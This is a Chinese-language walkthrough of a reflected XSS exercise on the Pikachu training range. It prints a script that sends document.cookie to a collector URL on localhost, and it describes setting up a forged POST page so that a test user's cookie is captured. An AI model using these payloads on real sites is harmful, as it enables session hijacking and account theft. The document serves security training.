pikachu靶场之反射型XSS（cookie盗取）

反射型XSS

尝试payload发现存在字符长度现在，使用F12查看元素，把maxlength属性改为足够长。使用最简单的payload：<script>alert('xss')</script>,出现弹窗，说明存在漏洞。
利用漏洞获取cookie实例操作
这里我们用的例子是post型，get型利用容易被受害者察觉，因为get型只能在url中插入<script> document.location = 'http://127.0.0.1/pkxss/xcookie/cookie.php?cookie=' + document.cookie; </script>类似脚本，而post型的话可以伪造一个界面，这样用户上当的概率更大。利用XSS漏洞获取cookie需要搭建一个cookie后台，这个靶场已经为我们建好了所以我们只需要初始化即可，在左侧功能栏的最下面有一个管理工具，进去XSS后台进行初始化。（一般初始化不了都是连接数据库配置文件的问题，只要修改pkxss/inc下的config.inc.php配置即可）
初始化XSS平台后登录等待cookie的到来就行

需要修改以下两个地址，第一个地址是将原界面的样子链接过来，让用户认为是原界面，第二个是将cookie从数据库中提取出来的程序（注意和自己的目录相对应）。

接下来打开我们伪造的一个页面http://127.0.0.1/pkxss/xcookie/post.html（这个文件在XSS后台的xcookie目录下）,在url中输入就会自动跳转到XSS反射型的post界面，然后我们输入靶场另一个测试账号test\abc123,登陆成功

在XSS后台的cookie搜集模块就可以看到受害者（test）的cookie记录（看不到的话需要再去访问一下这个伪造界面）。